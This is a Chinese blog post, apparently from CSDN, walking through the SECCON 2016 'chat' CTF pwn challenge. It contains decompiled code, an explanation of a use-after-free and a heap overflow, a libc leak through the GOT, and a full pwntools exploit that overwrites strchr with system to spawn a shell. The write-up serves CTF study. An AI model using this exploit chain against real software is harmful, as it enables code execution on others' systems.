[SECCON CTF 2016 Quals] Chat 分析与思考

最新推荐文章于 2023-11-20 23:13:09 发布
最新推荐文章于 2023-11-20 23:13:09 发布
阅读量496 收藏
点赞数 1
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tokameine/article/details/119829544
版权
博客详细分析了一款名为SimpleChatService的聊天室程序,指出其存在用户修改用户名时导致的Use-After-Free漏洞。作者展示了如何通过堆溢出复写函数指针,最终实现远程代码执行。文章涵盖了程序功能、漏洞原理、利用步骤和完整exploit代码,揭示了程序的安全风险。
摘要由CSDN通过智能技术生成

        CTFSHOW吃瓜杯,PWN方向第三题竟是SECCON原题,于是当时没有仔细研究,直接套用了其他大佬的EXP(第二第三第四题都是各大比赛的原题,网上可以直接找到写好的EXP......)

        既然现在比赛结束了,正好来补一下WP。收获很大,说明我还非常菜.....

正文:

函数:

        Main:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // eax
  int v4; // eax
  int v6; // [rsp+0h] [rbp-B0h]
  _QWORD *v7; // [rsp+8h] [rbp-A8h] BYREF
  char v8[136]; // [rsp+10h] [rbp-A0h] BYREF
  unsigned __int64 v9; // [rsp+98h] [rbp-18h]

  v9 = __readfsqword(0x28u);
  v7 = 0LL;
  fwrite("Simple Chat Service\n", 1uLL, 0x14uLL, stdout);
  do
  {
    if ( v7 )
    {
      service(v7);
      logout(&v7);
    }
    fwrite("\n1 : Sign Up\t2 : Sign In\n0 : Exit\nmenu > ", 1uLL, 0x29uLL, stdout);
    v3 = getint();
    v6 = v3;
    if ( v3 )
    {
      if ( v3 < 0 || v3 > 2 )
      {
        fwrite("Wrong Input...\n", 1uLL, 0xFuLL, stderr);
      }
      else
      {
        fwrite("name > ", 1uLL, 7uLL, stdout);
        getnline(v8, 32LL);
        if ( v6 == 1 )
          v4 = signup(v8);
        else
          v4 = login(&v7, v8);
        if ( v4 == 1 )
          fwrite("Success!\n", 1uLL, 9uLL, stdout);
        else
          fwrite("Failure...\n", 1uLL, 0xBuLL, stderr);
      }
    }
  }
  while ( v6 );
  return fwrite("Thank you for using Simple Chat Service!\n", 1uLL, 0x29uLL, stdout);
}

        Service: 

unsigned __int64 __fastcall service(_QWORD *a1)
{
  unsigned int v1; // eax
  int v2; // eax
  int v4; // [rsp+14h] [rbp-9Ch]
  __int64 v5; // [rsp+18h] [rbp-98h]
  char v6[136]; // [rsp+20h] [rbp-90h] BYREF
  unsigned __int64 v7; // [rsp+A8h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  fwrite("\nService Menu\n", 1uLL, 0xEuLL, stdout);
  do
  {
    fwrite(
      "\n"
      "1 : Show TimeLine\t2 : Show DM\t3 : Show UsersList\n"
      "4 : Send PublicMessage\t5 : Send DirectMessage\n"
      "6 : Remove PublicMessage\t\t7 : Change UserName\n"
      "0 : Sign Out\n"
      "menu >> ",
      1uLL,
      0xA3uLL,
      stdout);
    v4 = getint();
    switch ( v4 )
    {
      case 0:
        break;
      case 1:
        get_tweet(0LL);
        break;
      case 2:
        get_tweet(a1);
        break;
      case 3:
        list_users();
        break;
      case 4:
        fwrite("message >> ", 1uLL, 0xBuLL, stdout);
        getnline(v6, 0x80LL);
        post_tweet(a1, 0LL, v6);
        break;
      case 5:
        fwrite("name >> ", 1uLL, 8uLL, stdout);
        getnline(v6, 32LL);
        v5 = get_user(v6);
        if ( v5 )
        {
          fwrite("message >> ", 1uLL, 0xBuLL, stdout);
          getnline(v6, 128LL);
          post_tweet(a1, v5, v6);
        }
        else
        {
          fprintf(stderr, "User '%s' does not exist.\n", v6);
        }
        break;
      case 6:
        fwrite("id >> ", 1uLL, 6uLL, stdout);
        v1 = getint();
        v2 = remove_tweet(a1, v1);
        if ( v2 == -1 )
        {
          fwrite("Can not remove other user's message.\n", 1uLL, 0x25uLL, stderr);
        }
        else if ( !v2 )
        {
          fwrite("Message not found.\n", 1uLL, 0x13uLL, stderr);
        }
        break;
      case 7:
        fwrite("name >> ", 1uLL, 8uLL, stdout);
        getnline(v6, 32LL);
        if ( change_name(a1, v6) < 0 )
          v4 = 0;
        break;
      default:
        fwrite("Wrong Input...\n", 1uLL, 0xFuLL, stderr);
        break;
    }
    if ( v4 )
      fwrite("Done.\n", 1uLL, 6uLL, stdout);
  }
  while ( v4 );
  return __readfsqword(0x28u) ^ v7;
}

        程序大致实现了一个聊天室功能,能够注册、公共频道发消息、私信等等。

        审计代码时务必要捋清每个变量的意义,否则会因为大量的指针而失去方向。

         如下结构体为程序所用到的两个结构,整个程序从头到尾都只会对这两个结构进行操作,当然,要得出这样的结构体需要经过仔细的审计,其过程本文不再赘述,仅提供结果以方便之后的理解

struct user {
    char *name;
    struct message *msg;
    struct user *next_user;
}

struct message {
    int id ; // use in tweet (public message) only
    struct user *sender;
    char content[128];
    struct message *next_msg;
}

漏洞分析与利用:

__int64 __fastcall change_name(_QWORD *a1, const char *a2)
{
......
  else
  {
    fwrite("Change name error...\n", 1uLL, 0x15uLL, stderr);
    remove_user(a1);
    result = 0xFFFFFFFFLL;
  }
  return result;
}
void __fastcall remove_user(__int64 a1)
{
  __int64 i; // [rsp+18h] [rbp-18h]
  _QWORD *ptr; // [rsp+20h] [rbp-10h]
  _QWORD *v3; // [rsp+28h] [rbp-8h]
  _QWORD *v4; // [rsp+28h] [rbp-8h]
  void *v5; // [rsp+28h] [rbp-8h]

  for ( ptr = *(a1 + 8); ptr; ptr = v3 )
  {
    v3 = ptr[18];
    free(ptr);
  }
  for ( i = tl; i; i = *(i + 144) )
  {
    if ( *(i + 0x90) && *(*(i + 144) + 8LL) == a1 )
    {
      v4 = *(i + 144);
      *(i + 144) = v4[18];
      free(v4);
    }
  }
  if ( tl && *(tl + 8) == a1 )
  {
    v5 = tl;
    tl = *(tl + 144);
    free(v5);
  }
  free(*a1);
  free(a1);
}

        remove_user函数在程序中异常的扎眼。当用户尝试修改用户名时将进行检测,如果用户名的首字母是不可打印字符,就会直接将这个用户删除。但在remove_user中可以看见,并没有对free后的指针进行置NULL,看起来像是UAF,但该漏洞并不体现在free上,而是在该函数的逻辑上

        该函数将按如下顺序释放内存块:

  1. 将发送给该目标的私信message 释放
  2. 将该用户发送到公频的message 释放
  3. 将该用户的name 释放
  4. 将该用户本身释放

        但是,它并没有将该用户发送给其他用户的私信message释放,那么在其他用户看来,当该用户被删除之后,私信会变成什么样?如下过程进行了测试,笔者以F2按键按下的内容作为用户“aa”的新名字让其被删除,再显示用户“bb”收到的内容

Simple Chat Service

1 : Sign Up	2 : Sign In
0 : Exit
menu > 1
name > aa
Success!

1 : Sign Up	2 : Sign In
0 : Exit
menu > 1
name > bb
Success!

1 : Sign Up	2 : Sign In
0 : Exit
menu > 2
name > aa
Hello, aa!
Success!

Service Menu

1 : Show TimeLine	2 : Show DM	3 : Show UsersList
4 : Send PublicMessage	5 : Send DirectMessage
6 : Remove PublicMessage		7 : Change UserName
0 : Sign Out
menu >> 5
name >> bb
message >> from a
Done.

1 : Show TimeLine	2 : Show DM	3 : Show UsersList
4 : Send PublicMessage	5 : Send DirectMessage
6 : Remove PublicMessage		7 : Change UserName
0 : Sign Out
menu >> 7
name >> ^[OQ
Change name error...
Bye, 

1 : Sign Up	2 : Sign In
0 : Exit
menu > 2
name > bb
Hello, bb!
Success!

Service Menu

1 : Show TimeLine	2 : Show DM	3 : Show UsersList
4 : Send PublicMessage	5 : Send DirectMessage
6 : Remove PublicMessage		7 : Change UserName
0 : Sign Out
menu >> 2
Direct Messages
[] from a
Done.

        收到私信显示的名字出现了异常,但消息仍然能被显示出来

__int64 __fastcall get_tweet(__int64 a1)
{
  const char *v1; // rax
  __int64 v2; // rax
  unsigned int v4; // [rsp+1Ch] [rbp-14h]
  unsigned int *v5; // [rsp+20h] [rbp-10h]
  char *format; // [rsp+28h] [rbp-8h]

  if ( a1 )
    fprintf(stdout, "Direct Messages\n");
  else
    fprintf(stdout, "Time Line\n");
  if ( a1 )
    v1 = "[%s] %s\n";
  else
    v1 = "(%3$03d)[%s] %s\n";
  format = v1;
  v4 = 0;
  if ( a1 )
    v2 = *(a1 + 8);
  else
    v2 = tl;
  v5 = v2;
  while ( v5 )
  {
    fprintf(stdout, format, **(v5 + 1), v5 + 4, *v5);
    v5 = *(v5 + 18);
    ++v4;
  }
  return v4;
}

        显示规则如上,此处的变量 a1 为指向当前登录用户结构体的指针

        输出的名字为 **(v5 + 1) 

        既然该消息没有被释放,那么此处构成UAF(Use After Free),只要能够操作 *(v5+1) 的内容,就能泄露任意地址的内容

        *(v5+1) 为一个指向 name 的指针,在创建账号的时候会开辟一个user,然后再开辟一个name:

__int64 __fastcall signup(const char *a1)
{
  __int64 result; // rax
  int v2; // [rsp+14h] [rbp-Ch]
  _QWORD *ptr; // [rsp+18h] [rbp-8h]

  if ( get_user(a1) )
  {
    fprintf(stderr, "User '%s' already exists\n", a1);
    result = 0LL;
  }
  else
  {
    ptr = malloc(0x18uLL);
    v2 = hash(a1);
    if ( v2 >= 0 )
    {
      *ptr = strdup(a1);
      ptr[1] = 0LL;
      ptr[2] = user_tbl[v2];
      user_tbl[v2] = ptr;
      result = 1LL;
    }
    else
    {
      free(ptr);
      fwrite("Signup failed...\n", 1uLL, 0x11uLL, stderr);
      result = 0xFFFFFFFFLL;
    }
  }
  return result;
}

        特别的是,name通过strdup开辟(该函数会为字符串自动开辟合适大小空间然后进行拷贝)

        如果名字只有16个字符之内,strdup只开辟0x20大小空间,但名字能有32个字符,如果使用名字长达30,该函数就会开辟0x30大小的字符

        但如果其开辟了0x20,而用户通过改名来改为更长的字符就能实现堆溢出(0x20中只有0x10用于储存字符,而0x30中则有0x20储存内容)

        堆溢出在此处可以用于复写下一个chunk的size,构成heap overflow

        以及,在注销用户时也会按顺序先释放name再释放user,申请的时候会先申请user再申请name,我们的目的是让某个被注销的name重新被申请为某个user,这样在get_tweet时候得到的name指针即为新用户的name字段内容,该字段能通过change_name任意写地址

        至此,利用UAF泄露libc基址

        接下来是如何让程序执行 system("/bin/sh")

        基本思路是通过复写某个函数,让程序在调用时执行system

        其中目的函数为 strchr,原因如下:

int getint()
{
  int result; // eax
  char nptr[136]; // [rsp+0h] [rbp-A0h] BYREF
  unsigned __int64 v2; // [rsp+88h] [rbp-18h]

  v2 = __readfsqword(0x28u);
  memset(nptr, 0, 0x80uLL);
  if ( getnline(nptr, 128LL) )
    result = atoi(nptr);
  else
    result = 0;
  return result;
}
size_t __fastcall getnline(char *a1, int a2)
{
  char *v3; // [rsp+18h] [rbp-8h]

  fgets(a1, a2, stdin);
  v3 = strchr(a1, 10);
  if ( v3 )
    *v3 = 0;
  return strlen(a1);
}

        main函数中通过getint函数来获取参数,倘若输入“/bin/sh”,则在getnline中执行
 

        strchr("/bin/sh",10)

         替换之后就会变成

        system("/bin/sh")

        不过有些需要注意:

.got.plt:0000000000603018 off_603018      dq offset free          ; DATA XREF: _free↑r
.got.plt:0000000000603020 off_603020      dq offset strlen        ; DATA XREF: _strlen↑r
.got.plt:0000000000603028 off_603028      dq offset __stack_chk_fail
.got.plt:0000000000603028                                         ; DATA XREF: ___stack_chk_fail↑r
.got.plt:0000000000603030 off_603030      dq offset setbuf        ; DATA XREF: _setbuf↑r
.got.plt:0000000000603038 off_603038      dq offset strchr        ; DATA XREF: _strchr↑r
.got.plt:0000000000603040 off_603040      dq offset __libc_start_main
.got.plt:0000000000603040                                         ; DATA XREF: ___libc_start_main↑r
.got.plt:0000000000603048 off_603048      dq offset fgets         ; DATA XREF: _fgets↑r
.got.plt:0000000000603050 off_603050      dq offset strcmp        ; DATA XREF: _strcmp↑r
.got.plt:0000000000603058 off_603058      dq offset fprintf       ; DATA XREF: _fprintf↑r
.got.plt:0000000000603060 off_603060      dq offset __gmon_start__
.got.plt:0000000000603060                                         ; DATA XREF: ___gmon_start__↑r
.got.plt:0000000000603068 off_603068      dq offset tolower       ; DATA XREF: _tolower↑r
.got.plt:0000000000603070 off_603070      dq offset malloc        ; DATA XREF: _malloc↑r
.got.plt:0000000000603078 off_603078      dq offset isprint       ; DATA XREF: _isprint↑r
.got.plt:0000000000603080 off_603080      dq offset atoi          ; DATA XREF: _atoi↑r
.got.plt:0000000000603088 off_603088      dq offset fwrite        ; DATA XREF: _fwrite↑r
.got.plt:0000000000603090 off_603090      dq offset strdup        ; DATA XREF: _strdup↑r

        本例中笔者通过 got表中的__libc_start_main 来泄露基址,但其他函数又是否可行呢?如下为got表对应的内容:

gdb-peda$ tel 0x0000000000603018 16
0000| 0x603018 --> 0x7f974f791540 (<__GI___libc_free>:	push   r13)
0008| 0x603020 --> 0x7f974f7987a0 (<strlen>:	pxor   xmm0,xmm0)
0016| 0x603028 --> 0x4007f6 (<__stack_chk_fail@plt+6>:	push   0x2)
0024| 0x603030 --> 0x7f974f7836c0 (<setbuf>:	mov    edx,0x2000)
0032| 0x603038 --> 0x7f974f796b30 (<__strchr_sse2>:	movd   xmm1,esi)
0040| 0x603040 --> 0x7f974f72d750 (<__libc_start_main>:	push   r14)
0048| 0x603048 --> 0x7f974f77aae0 (<_IO_fgets>:	test   esi,esi)
0056| 0x603050 --> 0x7f974f7ac5f0 (<__strcmp_sse2_unaligned>:	mov    eax,edi)
0064| 0x603058 --> 0x7f974f762780 (<__fprintf>:	sub    rsp,0xd8)
0072| 0x603060 --> 0x400866 (<__gmon_start__@plt+6>:	push   0x9)
0080| 0x603068 --> 0x7f974f73ae70 (<tolower>:	lea    edx,[rdi+0x80])
0088| 0x603070 --> 0x7f974f791180 (<__GI___libc_malloc>:	push   rbp)
0096| 0x603078 --> 0x7f974f73add0 (<isprint>:	mov    rax,QWORD PTR [rip+0x396041]        # 0x7f974fad0e18)
0104| 0x603080 --> 0x7f974f743e90 (<atoi>:	sub    rsp,0x8)
0112| 0x603088 --> 0x7f974f77b6f0 (<__GI__IO_fwrite>:	push   r14)
0120| 0x603090 --> 0x7f974f7984f0 (<__GI___strdup>:	push   rbp)

        如下函数为change_name时的检查:

__int64 __fastcall hash(char *a1)
{
  int v2; // [rsp+1Ch] [rbp-4h]

  if ( !a1 )
    return 0xFFFFFFFFLL;
  v2 = tolower(*a1);
  if ( !isprint(v2) )
    return 0xFFFFFFFFLL;
  if ( v2 > 96 && v2 <= 122 )
    return (v2 - 96);
  return 0LL;
}

        在change_name时若没能通过该检查(第一个字符可打印),则会注销用户

        如果我们替换__GI___libc_malloc函数地址,替换之前先进入hash函数进行检测,而0x7f974f791180 最后一个字符0x80为不可打印字符,则会因为free(got)导致程序crash,其他函数也是同理

        而反观__libc_start_main函数地址0x7f974f72d750 ,最后一个字符为0x50,为可打印字符,因此才能正常通过检测,并成功leak

        最后则需要伪造chunk来复写strchr的地址,笔者的exp完成leak之后,bins的情况如下

fastbins
0x30: 0x17730a0 ◂— 0x0
unsortedbin
all: 0x1773060 —▸ 0x7f3718172b78 (main_arena+88) ◂— 0x1773060
smallbins
0xa0: 0x1773170 —▸ 0x7f3718172c08 (main_arena+232) ◂— 0x1773170

         0x1773060与用户malusr的user空间比较近,这块区域实则就是因为先前的remove_user而留下的,通过修改该内存块的size位即可完成heap overflow,然后通过post_tweet的方式构造payload,将0x60302a覆盖到user中的name指针处,使得该name指向0x60302a处,接下来就只需要通过change_name即可任意写got表了

完整EXP:

#coding=utf-8
from pwn import *
import sys
reload(sys)
sys.setdefaultencoding('utf8')
context.log_level='debug'


def signup(name):
	p.sendlineafter('>','1')
	p.sendlineafter('>',name)

def signin(name):
	p.sendlineafter('>','2')
	p.sendlineafter('>',name)

def changename(name):
	p.sendlineafter('>>','7')
	p.sendlineafter('>>',name)

def tweet(msg):
	p.sendlineafter('>>','4')
	p.sendlineafter('>>',msg)
def dm(user,msg):
	p.sendlineafter('>>','5')
	p.sendlineafter('>>',user)
	p.sendlineafter('>>',msg)	
def signout():
	p.sendlineafter('>>','0')


#p=remote("node4.buuoj.cn",27256)
p=process('./chat_seccon_2016')
elf=ELF('./chat_seccon_2016')
libc=elf.libc
ua="AAAA"
ub='BBBB'
uc='C'*30
signup(ua)
signup(ub)
signup(uc)
#gdb.attach(p)
signin(ua)
tweet("aaaa")
signout()

signin(ub)
tweet("bbbb")
dm(ua,'BA')
dm(uc,"BC")
signout()

signin(uc)
tweet("cccc")
signout()


signin(ub)
changename("\t")

signin(uc)
changename("\t")

gdb.attach(p)

ud='d'*7
signup(ud)
signin(ud)
for i in xrange(6,2,-1):
	changename('d'*i)


malusr = p64(elf.got['__libc_start_main'])
changename(malusr)
signout()

signin(ua)
p.sendlineafter(">> ", "2") 
p.recvuntil("[")
libc.address += u64(p.recv(6).ljust(8,"\x00")) - libc.symbols['__libc_start_main']
print hex(libc.address)
system=libc.symbols['system']
signout()

signin(malusr)
tweet("bins")

changename("i"*24+p8(0xa1))
changename(p8(0x40))
tweet("7"*16+p64(0x60302a))
changename("A"*6+"B"*8+p64(system))
p.sendlineafter(">> ", "/bin/sh\x00")
p.interactive()

         最后几行笔者打算做些适当的说明:

changename("i"*24+p8(0xa1))
changename(p8(0x40))
tweet("7"*16+p64(0x60302a))
changename("A"*6+"B"*8+p64(system))
p.sendlineafter(">> ", "/bin/sh\x00")
p.interactive()

         第一行通过堆溢出复写chunk的size,使得然后在change_name

        第二行则是为了绕过change_name中的检测:

  if ( user_tbl[v3] == a1 )
  {
    user_tbl[v3] = a1[2];
  }
  else
  {
    for ( i = user_tbl[v3]; i && *(i + 16) != a1; i = *(i + 16) )
      ;
    if ( !i )
      return 0xFFFFFFFFLL;
    *(i + 16) = a1[2];
  }

        如果缺少该行,第4行将会因为上述检测返回“-1”导致没能正确写入 

        经过笔者的测试,最终只要保证修改内容为“非字母”均可通过

       其原因为:第二行的复写让当前用户user指针被放入user_tbl,而在第4行时将对user_tbl进行检测;由于我们选择了__stack_chk_fail的最后一个字节作为新chunk的size位,其值为0x40,将会获得索引“0”,如果第二行使用任意“字母”,则返回的索引均为“非零”值,在上述检测里就没办法通过第一个判断了,而在另外一个循环里更加难以通过检查,因此事先user指针放入user_tbl[0]中,然后在接下来的改名里绕过检查

        最后就是一系列的复写了

Tokameine
关注
Seccon CTF 2016 部分Writeup.md
Bendawang's Blog
12-15 2552
Seccon CTF 2016 部分Writeup
Seccon CTF 2016 biscuiti writeup
Bendawang's Blog
12-15 3425
web300 biscuiti 题解 (web + crypto)
Seccon-CTF-2016-cheer_msg
02-24
样本来自2016年的Seccon ctf的一道pwn题,该题目使用了alloca内存分配函数,该函数不同于一般堆上的内存分配,而是在栈上进行。题解:https://blog.csdn.net/A951860555/article/details/114011564
PlaidCTF2020 Mooz Chat 复盘
蚁景网安学院
06-08 617
本文共计2943个词,预计阅读时间为5分钟目录前言逆向部分Part 1漏洞点Part 2总结01前言Part 1 (150 pts) —7 solves pasten A0E T...
SecChat_rsa_Vc_
10-02
采用2048bit 的RSA 数据加密算法对数据进行加密和数字签名后发出,因为RSA加密信息需要大量的时间,因此本程序适合用来传递密钥或对非常重要且信息量较少的网络通讯。
[BUUCTF-pwn] chat_seccon_2016
weixin_52640415的博客
12-28 170
没开PIE,got表可写,管理块里有指针。 有3种堆块: 用户块0x20 name_ptr, msg_ptr, next_user_ptr 用户块和消息块都是使用链表 名字块 0x20到0x30 消息块 0xa0 msg_id,sender_ptr, data:0x80, next_msg 数据不在开头不能直接free(sh) 漏洞点: //signup函数里用strdup读数据 ... ptr = malloc(0x18uLL); v2 = hash(a1); if .
聊天窗口
WYJ____的博客
09-08 560
import java.awt.*; import javax.swing.*; public class Test extends JFrame{//把需要的组件全部在这里定义 JTextArea wby;//文本域 JPanel mb; JComboBox xlk;//下拉框 JButton an; JTextField wbk;//文本框 JScrollPane gd; ...
Seccon-ctf-2016-pwn-cheer_msg 题解
lifanxin的博客
02-24 516
Write Up文件信息漏洞定位利用分析wp总结 文件信息 样本来自2016Seccon ctf的一道pwn题–cheer_msg,同时这道题目也给了libc文件,减少了漏洞利用难度。 检查样本信息:   32位小端程序,开启了栈溢出保护和NX保护。 漏洞定位 整个程序还是比较易懂的,主体逻辑存在于main和message两个函数。上图展示了main函数的伪C代码,要求输入一个长度,然后按照长度进行相应计算后使用alloca在栈上分配空间。这到题目比价新颖的是使用了alloca函数,该函数不同于一般的
CSAW CTF 2016 PWN quals-warmup
Hvnt3r的博客
03-06 2088
CSAW CTF 2016 PWN quals-warmup 原文链接 先对文件有个大致的了解,是64位ELF文件 ☁ csaw ctf 2016 quals-warmup ls exp.py flag.txt readme.txt warmup ☁ csaw ctf 2016 quals-warmup file warmup warmup: ELF 64-bit LSB exec...
Tinypad Seccon CTF 2016(House Of Einherjar)
Bill
04-18 1288
Tinypad Seccon CTF 2016(House Of Einherjar) 序言 随着对how2heap的学习, 难度也是越来越大, 改革进入了深水区. 程序运行 1.菜单 | [A] Add memo | | [D] Delet...
CTF练习题[WEB]-本地管理员
weixin_45246254的博客
10-11 3595
https://ctf.bugku.com/challenges/detail/id/79.html 拿到题目尝试登陆失败 提示IP禁止访问 抓包发现有注释信息 请求包添加 X-FORWARDED-FOR:127.0.0.1 Referer: localhost admin/test123 伪造本地IP,进行登录,获取flag
CTF练习题WP4
m0_73891130的博客
03-25 157
自己写的CTF常用网站的练习题目的WP,当然也有参考网上的大佬的WP
虚拟机搭建内网聊天工具rocket.chat | 如何查看正在执行的任务
Kni9hT's Blog
03-04 820
前言 因为CTF线下赛多是断网形式,这时候队内沟通需要一个内网聊天工具。很久之前用ubuntu搭建过一个rocket.chat,就分享一下。 环境:ubuntu18.04 方法一: 虚拟机安装docker 用docker搭建rocket 将虚拟机端口映射到本机上,以保证和你主机同一网络的人可以访问到(虚拟机网络改成侨接也许也行) 方法二:(比较方便且亲自尝试) 附教程网址: https:...
CTF Web的一些基础玩法
euphrioa的博客
05-07 1256
最近博主无聊的开始想打打ctf,开个博客记录一下。。 博主平时做前端开发做的比较多,ctf这边就打打web了。 1.按不下去的按钮和复制不了的文字 按钮按不了,控制台获取这个input对象设置其disabled为false,点击就可以。 这题本意是用document.οncοntextmenu=true设置右键可用,按下f12其实就好了。。 2.robots协议 robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,就可以创建和编辑它 。robots.txt是一个协议,而不是一个命令。r
CTF —— web方向思路
吃肉唐僧的博客
09-08 6410
这段时间在刷CTF题目,在做到web方向的时候,一开始面对题目的时候,总有一种束手无策的感觉,在做了一些web题目后,写一下总结希望以后做的时候可供参考 解题大方向 ctf不同于真实实战,有很多题解出来需要绕很多弯,有时候我都怀疑很多题目是为了出题而出题...... 这样有不好也有好,就是ctf的题目无论多难解,都会给你承上启下的线索,这个...
CTF-PWN-小tips
最新发布
llovewuzhengzi的博客
11-20 384
在使用“set detach-on-fork off”命令后,用“i inferiors”(i是info命令缩写)查看进程状态,可以看到父子进程都在被gdb调试的状态,前面显示“*”是正在调试的进程。通过libc找到environ地址后,泄露environ地址处的值,可以得到环境变量地址,环境变量保存在栈中,通过偏移可以得到栈上任意变量的地址。.tls段存储了一些有用的信息,例如main_arena的地址,canary的地址,还有一个栈上的地址,该地址总是和指向栈上的具有固定偏移量的位置。
聊天室的攻防技巧
相信自我
05-20 821
现在基于Web的聊天室有一般有两种形式:一种是需要用户认证的,即用户在登入服务器以前必须进行注册,一种是不需要认证的,即用户只需要用一个Nickname就可以登入到聊天室中,只要该聊天室中还不存在这个NickName就可以了。关于用户的消息处理,现在几乎所有的聊天室都关闭了对HTML和Javascript的支持,或者是仅仅允许一部分用户(比如聊天室的系统管理员等)使用这些功能。三、需要注意的问题和
CTF web总结
热门推荐
zb0567的专栏
05-18 1万+
从今天开始,关注CTF夺旗赛1、http://shiyanbar.com/ctf/56 what a fuck!这是什么鬼东西? 解题链接: http://ctf5.shiyanbar.com/DUTCTF/1.html ...
CTF/黑客之提问的智慧
半岛铁盒的博客
12-27 1587
转的一篇文章,原文https://github.com/ryanhanwu/How-To-Ask-Questions-The-Smart-Way 正文 在黑客的世界裡,当你抛出一个技术问题时,最终是否能得到有用的回答,往往取决于你所提问和追问的方式。本指南将教你如何正确的提问以获得你满意的答案。 不只是黑客,现在开放原始码(Open Source)软体已经相当盛行,你常常也可以由其他有经验的使用者身上得到好答案,这是件好事;使用者比起黑客来,往往对那些新手常遇到的问题更宽容一些。然而,将有经验的使用者视为黑
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值